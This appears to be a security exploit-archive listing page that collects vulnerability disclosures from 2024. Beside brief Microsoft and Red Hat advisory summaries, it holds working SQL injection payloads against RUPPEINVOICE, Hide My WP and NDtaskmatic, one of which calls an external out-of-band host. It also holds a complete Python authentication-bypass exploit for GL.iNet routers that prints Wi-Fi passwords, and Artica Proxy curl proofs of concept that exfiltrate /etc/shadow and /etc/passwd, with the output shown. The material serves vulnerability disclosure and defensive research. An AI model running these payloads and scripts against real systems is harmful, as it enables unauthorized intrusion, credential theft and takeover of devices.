**How could an attacker exploit this vulnerability?**

An attacker could exploit the vulnerability by tricking an authenticated user into attempting to connect to a malicious SQL server via OLEDB, which could result in the server receiving a malicious networking packet. This could allow the attacker to execute code remotely on the client.

CVE-2024-26161: Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability

CVE-2024-21450: Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability

CVE-2024-21441: Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability

RUPPEINVOICE version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: RUPPEINVOICE-1.0 Multiple-SQLi## Author: nu11secur1ty## Date: 03/09/2024## Vendor: https://www.mayurik.com/## Software: https://www.sourcecodester.com/php/14831/billing-system-project-php-source-code-free-download.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The username parameter appears to be vulnerable to SQL injectionattacks. The payload '+(selectload_file('\\\\abpf13cdvni2r5g9hn26os0bd2jv7m0ardf52vqk.oastify.com\\fmd'))+'was submitted in the username parameter. This payload injects a SQLsub-query that calls MySQL's load_file function with a UNC file paththat references a URL on an external domain. The applicationinteracted with that domain, indicating that the injected SQL querywas executed. The attacker can get all information from the system byusing this vulnerability!STATUS: HIGH- Vulnerability[+]Payload:```mysql---Parameter: username (POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: username=zBuveHif'+(selectload_file('\\\\abpf13cdvni2r5g9hn26os0bd2jv7m0ardf52vqk.oastify.com\\fmd'))+''OR NOT 6356=6356 AND 'Eocq'='Eocq&password=g7J!m3v!W2&login=    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: username=zBuveHif'+(selectload_file('\\\\abpf13cdvni2r5g9hn26os0bd2jv7m0ardf52vqk.oastify.com\\fmd'))+''AND (SELECT 4013 FROM (SELECT(SLEEP(7)))BnHP) AND'bCQt'='bCQt&password=g7J!m3v!W2&login=---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/RUPPEINVOICE-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/03/ruppeinvoice-10-multiple-sqli.html)## Time spend:00:35:00

RUPPEINVOICE 1.0 SQL Injection

WordPress Hide My WP plugin versions 6.2.9 and below suffer from an unauthenticated remote SQL injection vulnerability.

    # Exploit Title: Wordpress Plugin Hide My WP < 6.2.9 - Unauthenticated SQLi # Publication Date: 2023-01-11# Original Researcher: Xenofon Vassilakopoulos# Exploit Author: Xenofon Vassilakopoulos# Submitter: Xenofon Vassilakopoulos# Vendor Homepage: https://wpwave.com/# Version: Hide My WP v6.2.8 and prior# Tested on: Hide My WP v6.2.7# Impact: Database Access# CVE: CVE-2022-4681# CWE: CWE-89# CVSS Score: 8.6 (high)## DescriptionThe plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.## Proof of Conceptcurl -k --location --request GET "http://localhost:10008" --header "X-Forwarded-For: 127.0.0.1'+(select*from(select(sleep(20)))a)+'"

WordPress Hide My WP SQL Injection

NDtaskmatic version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: NDtaskmatic-1.0-by-Mayuri.K Multiple-SQLi## Author: nu11secur1ty## Date: 03/07/2024## Vendor: https://www.mayurik.com/## Software: https://www.sourcecodester.com/php/17217/employee-management-system-php-and-mysql-free-download.html## Reference: https://portswigger.net/web-security/sql-injection## Description:Potential SQLi detected. Please manually confirm it after you checkmanually the POST, GET, or other requests...The payload from the puncher_SQLi_bypass_authentication module wassubmitted successfully after the test.The task_id is vulnerable to SQLi attacks, the attacker can get allinformation from the system by using this vulnerability!STATUS: HIGH- Vulnerability[+]Payload:```mysql---Parameter: task_id (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: task_id=39' AND (SELECT 8670 FROM(SELECTCOUNT(*),CONCAT(0x7176767871,(SELECT(ELT(8670=8670,1))),0x717a717a71,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# FrpM    Type: stacked queries    Title: MySQL >= 5.0.12 stacked queries (comment)    Payload: task_id=39';SELECT SLEEP(7)#    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: task_id=39' AND (SELECT 9072 FROM (SELECT(SLEEP(7)))RtEq)# XSsn---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2024/NDtaskmatic-1.0-by-Mayuri.K)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/03/ndtaskmatic-10-by-mayurik-multiple-sqli.html)## Time spend:00:35:00-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ andhttps://www.exploit-db.com/0day Exploit DataBase https://0day.today/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=                          nu11secur1ty <http://nu11secur1ty.com/>-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and https://www.exploit-db.com/0day Exploit DataBase https://0day.today/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=                          nu11secur1ty <http://nu11secur1ty.com/>

NDtaskmatic 1.0 SQL Injection

Red Hat Security Advisory 2024-1195-03 - An update for the postgresql:12 module is now available for Red Hat Enterprise Linux 8.4 Advanced Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1195.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: postgresql:12 security updateAdvisory ID:        RHSA-2024:1195-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1195Issue date:         2024-03-06Revision:           03CVE Names:          CVE-2024-0985====================================================================Summary: An update for the postgresql:12 module is now available for Red Hat Enterprise Linux 8.4 Advanced Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:PostgreSQL is an advanced object-relational database management system (DBMS).Security Fix(es):* postgresql: non-owner 'REFRESH MATERIALIZED VIEW CONCURRENTLY' executes arbitrary SQL (CVE-2024-0985)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-0985References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2263384

Red Hat Security Advisory 2024-1195-03

GliNet with firmware version 4.x suffers from an authentication bypass vulnerability. Other firmware versions may also be affected.

DZONERZY Security Research

GLiNet: Router Authentication Bypass

========================================================================  
Contents  
========================================================================

1. Overview  
2. Detailed Description  
3. Exploit  
4. Timeline

========================================================================  
1. Overview  
========================================================================

CVE-2023-46453 is a remote authentication bypass vulnerability in the web  
interface of GLiNet routers running firmware versions 4.x and up. The  
vulnerability allows an attacker to bypass authentication and gain access  
to the router's web interface.

========================================================================  
2. Detailed Description  
========================================================================

The vulnerability is caused by a lack of proper authentication checks in  
/usr/sbin/gl-ngx-session file. The file is responsible for authenticating  
users to the web interface. The authentication is in different stages.

Stage 1:

During the first stage the user send a request to the challenge rcp  
endpoint. The endpoint returns a random nonce value used later in the  
authentication process.

Stage 2:

During the second stage the user sends a request to the login rcp endpoint  
with the username and the encrypted password. The encrypted password is  
calculated by the following formula:

md5(username + crypt(password) + nonce)

The crypt function is the standard unix crypt function.

The vulnerability lies in the fact that the username is not sanitized  
properly before being passed to the login_test function in the lua script.

------------------------------------------------------------------------  
local function login_test(username, hash)  
    if not username or username == "" then return false end

    for l in io.lines("/etc/shadow") do  
        local pw = l:match('^' .. username .. ':([^:]+)')  
        if pw then  
            for nonce in pairs(nonces) do  
                if utils.md5(table.concat({username, pw, nonce}, ":")) ==  
hash then  
                    nonces[nonce] = nil  
                    nonce_cnt = nonce_cnt - 1  
                    return true  
                end  
            end  
            return false  
        end  
    end

    return false  
end  
------------------------------------------------------------------------

This script check the username against the /etc/shadow file. If the username  
is found in the file the script will extract the password hash and compare  
it to the hash sent by the user. If the hashes match the user is  
authenticated.

The issue is that the username is not sanitized properly before being  
concatenated with the regex. This allows an attacker to inject a regex into  
the username field and modify the final behavior of the regex.

for instance, the following username will match the userid of the root user:

root:[^:]+:[^:]+ will become root:[^:]+:[^:]+:([^:]+)

This will match the "root:" string and then any character until the next ":"  
character. This will cause the script skip the password and return the  
user id instead.

Since the user id of the root user is always 0, the script will always  
return:

md5("root:[^:]+:[^:]+" + "0" + nonce)

Since this value is always the same, the attacker can simply send the known  
hash value to the login rcp endpoint and gain access to the web interface.

Anyway this approach won't work as expected since later in the code inside  
the  
this check appear:

------------------------------------------------------------------------  
    local aclgroup = db.get_acl_by_username(username)

    local sid = utils.generate_id(32)

    sessions[sid] = {  
        username = username,  
        aclgroup = aclgroup,  
        timeout = time_now() + session_timeout  
    }  
------------------------------------------------------------------------

The username which is now our custom regex will be passed to the  
get_acl_by_username  
function. This function will check the username against a database and  
return the aclgroup associated with the username.  
If the username is not found in the database the function will return nil,  
thus causing attack to fail.

By checking the code we can see that the get_acl_by_username function is  
actually appending our raw string to a query and then executing it.  
This means that we can inject a sql query into the username field and  
make it return a valid aclgroup.

------------------------------------------------------------------------  
M.get_acl_by_username = function(username)  
    if username == "root" then return "root" end

    local db = sqlite3.open(DB)  
    local sql = string.format("SELECT acl FROM account WHERE username =  
'%s'", username)

    local aclgroup = ""

    for a in db:rows(sql) do  
        aclgroup = a[1]  
    end

    db:close()

    return aclgroup  
end  
------------------------------------------------------------------------

Using this payload we were able to craft a username which is both a valid  
regex and a valid sql query:

roo[^'union selecT char(114,111,111,116)--]:[^:]+:[^:]+

this will make the sql query become:

SELECT acl FROM account WHERE username = 'roo[^'union selecT  
char(114,111,111,116)--]:[^:]+:[^:]+'

which will return the aclgroup of the root user (root).

========================================================================  
3. Exploit  
========================================================================

------------------------------------------------------------------------  
# Exploit Title: [CVE-2023-46453] GL.iNet - Authentication Bypass  
# Date: 18/10/2023  
# Exploit Author: Daniele 'dzonerzy' Linguaglossa  
# Vendor Homepage: https://www.gl-inet.com/  
# Vulnerable Devices:  
#   GL.iNet GL-MT3000 (4.3.7)  
#   GL.iNet GL-AR300M(4.3.7)  
#   GL.iNet GL-B1300 (4.3.7)  
#   GL.iNet GL-AX1800 (4.3.7)  
#   GL.iNet GL-AR750S (4.3.7)  
#   GL.iNet GL-MT2500 (4.3.7)  
#   GL.iNet GL-AXT1800 (4.3.7)  
#   GL.iNet GL-X3000 (4.3.7)  
#   GL.iNet GL-SFT1200 (4.3.7)  
#   And many more...  
# Version: 4.3.7  
# Firmware Release Date: 2023/09/13  
# CVE: CVE-2023-46453

from urllib.parse import urlparse  
import requests  
import hashlib  
import random  
import sys

def exploit(url):  
    try:  
        requests.packages.urllib3.disable_warnings()  
        host = urlparse(url)  
        url = f"{host.scheme}://{host.netloc}/rpc"  
        print(f"[*] Target: {url}")  
        print("[*] Retrieving nonce...")  
        nonce = requests.post(url, verify=False, json={  
            "jsonrpc": "2.0",  
            "id": random.randint(1000, 9999),  
            "method": "challenge",  
            "params": {"username": "root"}  
        }, timeout=5).json()  
        if "result" in nonce and "nonce" in nonce["result"]:  
            print(f"[*] Got nonce: {nonce['result']['nonce']} !")  
        else:  
            print("[!] Nonce not found, exiting... :(")  
            sys.exit(1)  
        print("[*] Retrieving authentication token for root...")  
        md5_hash = hashlib.md5()  
        md5_hash.update(  
            f"roo[^'union selecT  
char(114,111,111,116)--]:[^:]+:[^:]+:0:{nonce['result']['nonce']}".encode())  
        password = md5_hash.hexdigest()  
        token = requests.post(url, verify=False, json={  
            "jsonrpc": "2.0",  
            "id": random.randint(1000, 9999),  
            "method": "login",  
            "params": {  
                "username": f"roo[^'union selecT  
char(114,111,111,116)--]:[^:]+:[^:]+",  
                "hash": password  
            }  
        }, timeout=5).json()  
        if "result" in token and "sid" in token["result"]:  
            print(f"[*] Got token: {token['result']['sid']} !")  
        else:  
            print("[!] Token not found, exiting... :(")  
            sys.exit(1)  
        print("[*] Checking if we are root...")  
        check = requests.post(url, verify=False, json={  
            "jsonrpc": "2.0",  
            "id": random.randint(1000, 9999),  
            "method": "call",  
            "params": [token["result"]["sid"], "system", "get_status", {}]  
        }, timeout=5).json()  
        if "result" in check and "wifi" in check["result"]:  
            print("[*] We are authenticated as root! :)")  
            print("[*] Below some info:")  
            for wifi in check["result"]["wifi"]:  
                print(f"[*] --------------------")  
                print(f"[*] SSID: {wifi['ssid']}")  
                print(f"[*] Password: {wifi['passwd']}")  
                print(f"[*] Band: {wifi['band']}")  
            print(f"[*] --------------------")  
        else:  
            print("[!] Something went wrong, exiting... :(")  
            sys.exit(1)  
    except requests.exceptions.Timeout:  
        print("[!] Timeout error, exiting... :(")  
        sys.exit(1)  
    except KeyboardInterrupt:  
        print(f"[!] Something went wrong: {e}")

if __name__ == "__main__":  
    print("GL.iNet Auth Bypass\n")  
    if len(sys.argv) < 2:  
        print(  
            f"Usage: python3 {sys.argv[1]} https://target.com",  
file=sys.stderr)  
        sys.exit(0)  
    else:  
        exploit(sys.argv[1])  
------------------------------------------------------------------------

========================================================================  
4. Timeline  
========================================================================

2023/09/13 - Vulnerability discovered  
2023/09/14 - CVE-2023-46453 requested  
2023/09/20 - Vendor contacted  
2023/09/20 - Vendor replied  
2023/09/30 - CVE-2023-46453 assigned  
2023/11/08 - Vulnerability patched and fix released

GliNet 4.x Authentication Bypass

The Rich Filemanager feature of Artica Proxy versions 4.40 and 4.50 provides a web-based interface for file management capabilities. When the feature is enabled, it does not require authentication by default, and runs as the root user. This provides an unauthenticated attacker complete access to the file system.

    KL-001-2024-003: Artica Proxy Unauthenticated File Manager VulnerabilityTitle: Artica Proxy Unauthenticated File Manager VulnerabilityAdvisory ID: KL-001-2024-003Publication Date: 2024.03.05Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2024-003.txt1. Vulnerability Details      Affected Vendor: Artica      Affected Product: Artica Proxy      Affected Version: 4.40 and 4.50      Platform: Debian 10 LTS      CWE Classification: CWE-288: Authentication Bypass Using an                          Alternate Path or Channel, CWE-552: Files                          or Directories Accessible to External                          Parties      CVE ID: CVE-2024-20552. Vulnerability Description      The "Rich Filemanager" feature of Artica Proxy provides a      web-based interface for file management capabilities. When      the feature is enabled, it does not require authentication by      default, and runs as the root user.3. Technical Description      The Artica Proxy can be installed with a small amount of      "Features" enabled. Within the administrative web interface,      additional features can be installed, enabled, and disabled. The      "Rich Filemanager" feature is disabled by default. Enabling      this feature will spawn a listener on port 5000/tcp bound to      0.0.0.0. By default, when this feature is enabled, authentication      is not required to access the web interface. The "Rich      Filemanager" runs as the root user. This provides an      unauthenticated attacker complete access to the file system.        root@artica:~# ps -efww | grep -i File        root      1888  1885  0 09:13 ?        00:00:00 php-fpm: pool RICHFILEMANAGER        root      1889  1885  0 09:13 ?        00:00:00 php-fpm: pool RICHFILEMANAGER      This can be exploited by an attacker to add entries in to      /etc/shadow, /etc/passwd, and /etc/ssh/sshd_config to create      an additional root-level account that has the ability to SSH      in to the system.4. Mitigation and Remediation Recommendation      No response from vendor. Rich Filemanager feature is disabled      by default. Leave it that way.5. Credit      This vulnerability was discovered by Jim Becher of KoreLogic,      Inc.6. Disclosure Timeline      2023.12.18 - KoreLogic requests vulnerability contact and                   secure communication method from Artica.      2023.12.18 - Artica Support issues automated ticket #1703011342                   promising follow-up from a human.      2024.01.10 - KoreLogic again requests vulnerability contact and                   secure communication method from Artica.      2024.01.10 - KoreLogic mail daemon receives SMTP 554 5.7.1 from                   mail.articatech.com with response                   "Client host rejected: Go Away!"      2024.01.11 - KoreLogic requests vulnerability contact and                   secure communication method via                   https://www.articatech.com/ 'Contact Us' web form.      2024.01.23 - KoreLogic requests CVE from MITRE.      2024.01.23 - MITRE issues automated ticket #1591692 promising                   follow-up from a human.      2024.02.01 - 30 business days have elapsed since KoreLogic                   attempted to contact the vendor.      2024.02.06 - KoreLogic requests update on CVE from MITRE.      2024.02.15 - KoreLogic requests update on CVE from MITRE.      2024.02.22 - KoreLogic reaches out to alternate CNA for                   CVE identifiers.      2024.02.26 - 45 business days have elapsed since KoreLogic                   attempted to contact the vendor.      2024.02.29 - Vulnerability details presented to AHA!                   (takeonme.org) by proxy.      2024.03.01 - AHA! issues CVE-2024-2055 to track this                   vulnerability.      2024.03.05 - KoreLogic public disclosure.7. Proof of Concept      Step 1: Move /etc/shadow to /tmp/shadow      $ curl -s -k -X $'GET' -H $'Host: 192.168.2.139:5000' -H $'Accept: application/json, text/javascript, */*; q=0.01' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'X-Requested-With: XMLHttpRequest' -H $'Connection: close' $'http://192.168.2.139:5000/connectors/php/filemanager.php?time=1700885542096&mode=move&old=%2Fetc%2Fshadow&new=%2Ftmp%2F&_=1700868631198'{"data":{"id":"\/tmp\/shadow","type":"file","attributes":{"name":"shadow","path":"\/tmp\/shadow","readable":1,"writable":1,"created":"","modified":"24 Nov 2023 15:55","timestamp":1700862914,"height":0,"width":0,"size":"2037"}}}      Step 2: Download /tmp/shadow      $ curl -s -k -X $'GET' -H $'Host: 192.168.2.139:5000' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' -H $'Pragma: no-cache' -H $'Cache-Control: no-cache' $'http://192.168.2.139:5000/connectors/php/filemanager.php?mode=download&path=%2Ftmp%2Fshadow&time=1700885590870'root:$6$Pvb1ivrg5oo.a/om$xtRvfpBBSZgPt/fDjHzw9k9e.jxWaY.LPOqnqHJcSBuQMxtjtG6pBBMMf1Z6D4jtN6kDSB3h5FufJ9DuXv.7R0:19507:0:99999:7:::      daemon:*:19507:0:99999:7:::      bin:*:19507:0:99999:7:::      sys:*:19507:0:99999:7:::      sync:*:19507:0:99999:7:::      games:*:19507:0:99999:7:::      man:*:19507:0:99999:7:::      lp:*:19507:0:99999:7:::      mail:*:19507:0:99999:7:::      news:*:19507:0:99999:7:::      uucp:*:19507:0:99999:7:::      proxy:*:19507:0:99999:7:::      www-data:*:19507:0:99999:7:::      backup:*:19507:0:99999:7:::      list:*:19507:0:99999:7:::      irc:*:19507:0:99999:7:::      gnats:*:19507:0:99999:7:::      nobody:*:19507:0:99999:7:::      _apt:*:19507:0:99999:7:::      systemd-timesync:*:19507:0:99999:7:::      systemd-network:*:19507:0:99999:7:::      systemd-resolve:*:19507:0:99999:7:::      messagebus:*:19507:0:99999:7:::      quagga:*:19507:0:99999:7:::      apt-mirror:*:19507:0:99999:7:::      privoxy:*:19507:0:99999:7:::      ntp:*:19507:0:99999:7:::      redsocks:!:19507:0:99999:7:::      prads:*:19507:0:99999:7:::      freerad:*:19507:0:99999:7:::      vnstat:*:19507:0:99999:7:::      stunnel4:!:19507:0:99999:7:::      sshd:*:19507:0:99999:7:::      vde2-net:*:19507:0:99999:7:::      memcache:!:19507:0:99999:7:::      davfs2:*:19507:0:99999:7:::      ziproxy:!:19507:0:99999:7:::      proftpd:!:19507:0:99999:7:::      ftp:*:19507:0:99999:7:::      mosquitto:*:19507:0:99999:7:::      openldap:!:19507:0:99999:7:::      munin:*:19507:0:99999:7:::      msmtp:*:19507:0:99999:7:::      Debian-snmp:!:19507:0:99999:7:::      opendkim:*:19507:0:99999:7:::      avahi:*:19507:0:99999:7:::      glances:*:19507:0:99999:7:::      ArticaStats:!:19507:0:99999:7:::      netdata:!:19507:0:99999:7:::      mysql:!:19507:0:99999:7:::      postfix:!:19507:0:99999:7:::      squid:!:19507:0:99999:7:::      smokeping:!:19507:0:99999:7:::      unbound:!:19645:0:99999:7:::      Step 3: Move /tmp/shadow back to /etc/shadow as not to create a DoS condition      $ curl -s -k -X $'GET' -H $'Host: 192.168.2.139:5000' -H $'Accept: application/json, text/javascript, */*; q=0.01' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'X-Requested-With: XMLHttpRequest' -H $'Connection: close' $'http://192.168.2.139:5000/connectors/php/filemanager.php?time=1700885798719&mode=move&old=%2Ftmp%2Fshadow&new=%2Fetc%2F&_=1700868631208'{"data":{"id":"\/etc\/shadow","type":"file","attributes":{"name":"shadow","path":"\/etc\/shadow","readable":0,"writable":1,"created":"","modified":"24 Nov 2023 15:55","timestamp":1700862914,"height":0,"width":0,"size":0}}}The contents of this advisory are copyright(c) 2024KoreLogic, Inc. and are licensed under a Creative CommonsAttribution Share-Alike 4.0 (United States) License:http://creativecommons.org/licenses/by-sa/4.0/KoreLogic, Inc. is a founder-owned and operated company with aproven track record of providing security services to entitiesranging from Fortune 500 to small and mid-sized companies. Weare a highly skilled team of senior security consultants doingby-hand security assessments for the most important networks inthe U.S. and around the world. We are also developers of varioustools and resources aimed at helping the security community.https://www.korelogic.com/about-korelogic.htmlOur public vulnerability disclosure policy is available at:https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt

Artica Proxy 4.40 / 4.50 Authentication Bypass / Privilege Escalation

Artica Proxy versions 4.40 and 4.50 suffer from a local file inclusion protection bypass vulnerability that allows for path traversal.

    KL-001-2024-001: Artica Proxy Unauthenticated LFI Protection Bypass VulnerabilityTitle: Artica Proxy Unauthenticated LFI Protection Bypass VulnerabilityAdvisory ID: KL-001-2024-001Publication Date: 2024.03.05Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2024-001.txt1. Vulnerability Details      Affected Vendor: Artica      Affected Product: Artica Proxy      Affected Version: 4.40 and 4.50      Platform: Debian 10 LTS      CWE Classification: CWE-23: Relative Path Traversal      CVE ID: CVE-2024-20532. Vulnerability Description      The Artica Proxy administrative web application attempts to      prevent local file inclusion. These protections can be bypassed      and arbitrary file requests supplied by unauthenticated      users will be returned according to the privileges of the      "www-data" user.3. Technical Description      Prior to authentication, a user can send an HTTP request to      the "images.listener.php" endpoint. This endpoint processes      the "mailattach" query parameter and concatonates the user      supplied value to the "/opt/artica/share/www/attachments/"      file path. The contents of the file located at the newly      created path is returned in the HTTP response body.      The "images.listener.php" endpoint attempts to prevent      a local file inclusion vulnerability by stripping strings      that attempt to traverse into the parent directory from      the user supplied "mailattach" value:$_GET["mailattach"]=str_replace("////","/",$_GET["mailattach"]);$_GET["mailattach"]=str_replace("///","/",$_GET["mailattach"]);$_GET["mailattach"]=str_replace("//","/",$_GET["mailattach"]);$_GET["mailattach"]=str_replace("../","",$_GET["mailattach"]);$_GET["mailattach"]=str_replace("/etc/","",$_GET["mailattach"]);$_GET["mailattach"]=str_replace("passwd","",$_GET["mailattach"]);$file="/opt/artica/share/www/attachments/{$_GET["mailattach"]}";        header("Content-type: application/force-download" );        header("Content-Disposition: attachment; \                filename=\"{$_GET["mailattach"]}\"");        header("Content-Length: ".filesize($file)."" );        header("Expires: 0" );        readfile($file);      If effective, this approach would limit files      accessible by this endpoint to those within the      "/opt/artica/share/www/attachments/" directory. Unfortunately,      the removal of the "../" string is only performed once, so      the resulting file path is not checked.  By using the path      "..././foo.txt", the "images.listener.php" endpoint removes the      "../" string resulting in "../foo.txt" - a relative file path      to traverse to the parent directory.      The strings "/etc/" and "passwd" are also stripped from the file      path as many methods of detecting a path traversal vulnerability      rely on fetching the "/etc/passwd" file. By inserting these      strings into specific locations, a user suppplied "mailattach"      value such as "/epasswdtc/ppasswdasswd" is transformed into      "/etc/passwd", bypassing the protection entirely.      An unauthenticated user can leverage this endpoint to read      files on the system, according to the privileges of the      "www-data" user.4. Mitigation and Remediation Recommendation      No response from vendor; no remediation available.5. Credit      This vulnerability was discovered by Jaggar Henry of KoreLogic,      Inc.6. Disclosure Timeline      2023.12.18 - KoreLogic requests vulnerability contact and                   secure communication method from Artica.      2023.12.18 - Artica Support issues automated ticket #1703011342                   promising follow-up from a human.      2024.01.10 - KoreLogic again requests vulnerability contact and                   secure communication method from Artica.      2024.01.10 - KoreLogic mail daemon receives SMTP 554 5.7.1 from                   mail.articatech.com with response                   "Client host rejected: Go Away!"      2024.01.11 - KoreLogic requests vulnerability contact and                   secure communication method via                   https://www.articatech.com/ 'Contact Us' web form.      2024.01.23 - KoreLogic requests CVE from MITRE.      2024.01.23 - MITRE issues automated ticket #1591692 promising                   follow-up from a human.      2024.02.01 - 30 business days have elapsed since KoreLogic                   attempted to contact the vendor.      2024.02.06 - KoreLogic requests update on CVE from MITRE.      2024.02.15 - KoreLogic requests update on CVE from MITRE.      2024.02.22 - KoreLogic reaches out to alternate CNA for                   CVE identifiers.      2024.02.26 - 45 business days have elapsed since KoreLogic                   attempted to contact the vendor.      2024.02.29 - Vulnerability details presented to AHA!                   (takeonme.org) by proxy.      2024.03.01 - AHA! issues CVE-2024-2053 to track this                   vulnerability.      2024.03.05 - KoreLogic public disclosure.7. Proof of Concept      $ curl -k 'https://192.168.2.129:9000/images.listener.php?uri=1&mailattach=..././..././..././..././..././epasswdtc/ppasswdasswd'      root:x:0:0:root:/root:/bin/bash      daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin      bin:x:2:2:bin:/bin:/usr/sbin/nologin      sys:x:3:3:sys:/dev:/usr/sbin/nologin      sync:x:4:65534:sync:/bin:/bin/sync      games:x:5:60:games:/usr/games:/usr/sbin/nologin      man:x:6:12:man:/var/cache/man:/usr/sbin/nologin      lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin      mail:x:8:8:mail:/var/mail:/usr/sbin/nologin      news:x:9:9:news:/var/spool/news:/usr/sbin/nologin      uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin      proxy:x:13:13:proxy:/bin:/usr/sbin/nologin      www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin      backup:x:34:34:backup:/var/backups:/usr/sbin/nologin      list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin      irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin      gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin      nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin      _apt:x:100:65534::/nonexistent:/usr/sbin/nologin      systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin      systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin      systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin      messagebus:x:104:110::/nonexistent:/usr/sbin/nologin      mysql:x:105:112:MySQL Server,,,:/nonexistent:/bin/false      quagga:x:106:114:Quagga routing suite,,,:/run/quagga/:/usr/sbin/nologin      apt-mirror:x:107:115::/var/spool/apt-mirror:/bin/sh      privoxy:x:108:65534::/etc/privoxy:/usr/sbin/nologin      ntp:x:109:117::/nonexistent:/usr/sbin/nologin      redsocks:x:110:118::/var/run/redsocks:/usr/sbin/nologin      prads:x:111:120::/home/prads:/usr/sbin/nologin      freerad:x:112:121::/etc/freeradius:/usr/sbin/nologin      vnstat:x:113:122:vnstat daemon,,,:/var/lib/vnstat:/usr/sbin/nologin      stunnel4:x:114:123::/var/run/stunnel4:/usr/sbin/nologin      sshd:x:115:65534::/run/sshd:/usr/sbin/nologin      vde2-net:x:116:124::/var/run/vde2:/usr/sbin/nologin      memcache:x:117:125:Memcached,,,:/nonexistent:/bin/false      davfs2:x:118:126::/var/cache/davfs2:/usr/sbin/nologin      ziproxy:x:119:127::/var/run/ziproxy:/usr/sbin/nologin      proftpd:x:120:65534::/run/proftpd:/usr/sbin/nologin      ftp:x:121:65534::/srv/ftp:/usr/sbin/nologin      mosquitto:x:122:128::/var/lib/mosquitto:/usr/sbin/nologin      openldap:x:123:129:OpenLDAP Server Account,,,:/var/lib/ldap:/bin/false      munin:x:124:130:munin application user,,,:/var/lib/munin:/usr/sbin/nologin      msmtp:x:125:131::/var/lib/msmtp:/usr/sbin/nologin      Debian-snmp:x:126:132::/var/lib/snmp:/bin/false      opendkim:x:127:133::/var/run/opendkim:/usr/sbin/nologin      avahi:x:128:134:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin      glances:x:129:135::/var/lib/glances:/usr/sbin/nologinArticaStats:x:1000:1000:ArticaStats:/home/ArticaStats:/bin/bash      Debian-exim:x:130:138::/var/spool/exim4:/usr/sbin/nologin      smokeping:x:131:139:SmokePing daemon,,,:/var/lib/smokeping:/usr/sbin/nologin      debian-spamd:x:132:140::/var/lib/spamassassin:/bin/sh      netdata:x:1001:1002:netdata:/home/netdata:/bin/bash      postfix:x:1002:1001::/home/postfix:/bin/sh      ...      ...The contents of this advisory are copyright(c) 2024KoreLogic, Inc. and are licensed under a Creative CommonsAttribution Share-Alike 4.0 (United States) 